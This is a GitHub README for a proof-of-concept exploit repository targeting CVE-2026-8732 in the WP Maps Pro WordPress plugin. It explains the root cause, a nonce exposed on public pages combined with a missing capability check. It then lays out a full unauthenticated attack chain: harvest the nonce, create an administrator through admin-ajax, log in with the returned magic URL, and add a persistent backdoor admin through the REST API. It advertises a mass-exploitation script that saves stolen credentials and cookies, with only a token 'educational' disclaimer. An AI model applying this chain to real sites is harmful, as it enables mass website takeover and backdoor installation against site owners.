xShadow-Here/CVE-2026-8732

GitHub: xShadow-Here/CVE-2026-8732

Stars: 0 | Forks: 1

CVE-2026-8732 — WP Maps Pro ≤ 6.1.0

♡ Unauthenticated Privilege Escalation via Administrator Account Creation ♡
=== shadow ♡ & friska ===

## 📋 Vulnerability Info

| Field | Details | |-------|---------| | **CVE ID** | CVE-2026-8732 | | **CVSS Score** | 9.8 (Critical) | | **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` | | **Type** | Missing Authentication for Critical Function | | **Plugin** | WP Maps Pro (`wp-google-map-gold`) | | **Affected** | All versions ≤ 6.1.0 | | **Patched** | 6.1.1 | | **Published** | May 28, 2026 | | **Researcher** | [David Brown](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/david-brown) | | **PoC** | Shadow & Friska 😈 |

## 🔍 Description The **WP Maps Pro** plugin for WordPress is vulnerable to **Unauthenticated Privilege Escalation via Administrator Account Creation**. The `wpgmp_temp_access_ajax` AJAX action is registered with `wp_ajax_nopriv_` and protected only by a nonce check using the `fc-call-nonce` nonce — which is **publicly embedded into every frontend page** via `wp_localize_script` as the `nonce` field of the `wpgmp_local` JavaScript object. This renders the nonce check **completely ineffective** as an access control mechanism, allowing unauthenticated attackers to: 1. Extract the nonce from any public page 2. Invoke the `wpgmp_temp_access_support` handler with `check_temp=false` 3. Trigger unconditional creation of a new WordPress **Administrator** account 4. Receive a magic login URL that calls `wp_set_auth_cookie()` — granting full admin access 5. Create a persistent backdoor account ## 🧬 Root Cause Analysis ### 1. Hook Registered Inside `is_admin()` Block — But `is_admin()` is Always True for AJAX // wp-google-map-gold.php if ( is_admin() ) { // ← is_admin() = TRUE for all admin-ajax.php requests! add_action( 'wp_ajax_wpgmp_temp_access_ajax', [ $this, 'wpgmp_temp_access_ajax_callback'] ); add_action( 'wp_ajax_nopriv_wpgmp_temp_access_ajax', [ $this, 'wpgmp_temp_access_ajax_callback'] ); // ← nopriv = unauthenticated! } ### 2. Nonce Exposed to Every Frontend Page // classes/wpgmp-helper.php $wpgmp_local = [ 'urlforajax' => admin_url( 'admin-ajax.php' ), 'nonce' => wp_create_nonce( 'fc-call-nonce' ), // ← LEAKED to public HTML! // ... ]; wp_localize_script( 'wpgmp-google-map-main', 'wpgmp_local', $wpgmp_local ); Any visitor can read the nonce from page source. WordPress nonces are CSRF tokens — not authentication tokens. ### 3. No Capability Check in AJAX Callback function wpgmp_temp_access_ajax_callback(){ check_ajax_referer( 'fc-call-nonce', 'nonce' ); // ← bypassed via public nonce // NO current_user_can() check! $temp_access = new WPGMP_Temp_Access(); $response = $temp_access->wpgmp_temp_access_support(); wp_send_json($response); } ### 4. Unconditional Admin Account Creation // classes/wpgmp-temp-access.php if (isset($_POST['check_temp']) && $_POST['check_temp'] == 'false') { $username = 'fc_user_' . uniqid(); // random username $email = 'support@flippercode.com'; // hardcoded email $role = 'administrator'; // hardcoded role ← ROOT CAUSE $result = self::fc_create_new_user($username, $email, $role); if (is_numeric($result)) { $access_link = self::generate_login_link($result); $response['url'] = $access_link; // ← magic URL returned to attacker! } } ### 5. Magic Login via `init` Hook — No Expiry, No Single-Use // Hooked to init — runs on EVERY request, no auth required function wpgmp_access_token_check(){ if ( ! empty( $_GET['wpgmp_token'] ) ) { $temp_access->get_valid_user_based_on_wpgmp_token($wpgmp_access_token); } } // Inside get_valid_user_based_on_wpgmp_token(): wp_set_current_user( $temporary_user_id, $temporary_user_login ); wp_set_auth_cookie( $temporary_user_id ); // ← SESSION SET AS ADMIN wp_safe_redirect( admin_url() ); // ← REDIRECT TO DASHBOARD ## ⚔️ Attack Chain [Unauthenticated Attacker] │ ▼ GET /any-page/ ← HTML: wpgmp_local = {"nonce":"XXXXXXXX",...} │ ▼ POST /wp-admin/admin-ajax.php action=wpgmp_temp_access_ajax nonce=XXXXXXXX check_temp=false ← {"url":"https://target.com/wp-admin/?wpgmp_token=<128-hex>"} │ ▼ GET /wp-admin/?wpgmp_token=<128-hex> ← wp_set_auth_cookie() fired ← 302 → /wp-admin/ │ ▼ [Full Administrator Access] 💀 │ ▼ POST /wp-json/wp/v2/users X-WP-Nonce: {"username":"backdoor","password":"...","roles":["administrator"]} │ ▼ [Persistent Backdoor Created] 😈 ## 🛠️ Tools ### `shadow.py` — Full Exploit Chain Single target or mass exploitation. # Interactive python3 shadow.py # Single target python3 shadow.py -u https://target.com # Mass exploit python3 shadow.py -f targets.txt -t 20 **Exploit Phases:** Phase 1 ▶ Plugin & Feature Detection Phase 2 ▶ Nonce Scan (parallel crawler) Phase 3 ▶ Admin Creation via AJAX Phase 4 ▶ Magic Login (wp_set_auth_cookie) Phase 5 ▶ Persistent Backdoor (REST API) **Output (`pwned.txt`):** 1. ======================================================= Target : https://target.com/wp-admin/ User : shadow_xxxxx Pass : Xk9#mQ2pLrTv8nYw Email : xxxxx@xxxx.com Magic : https://target.com/wp-admin/?wpgmp_token=... ======================================================= Cookies : ======================================================= wordpress_logged_in_...=fc_user_... ======================================================= ## 🔒 Mitigation Update WP Maps Pro to version **6.1.1** or newer.

**[shadow ♡ friska]** — for educational and authorized security research only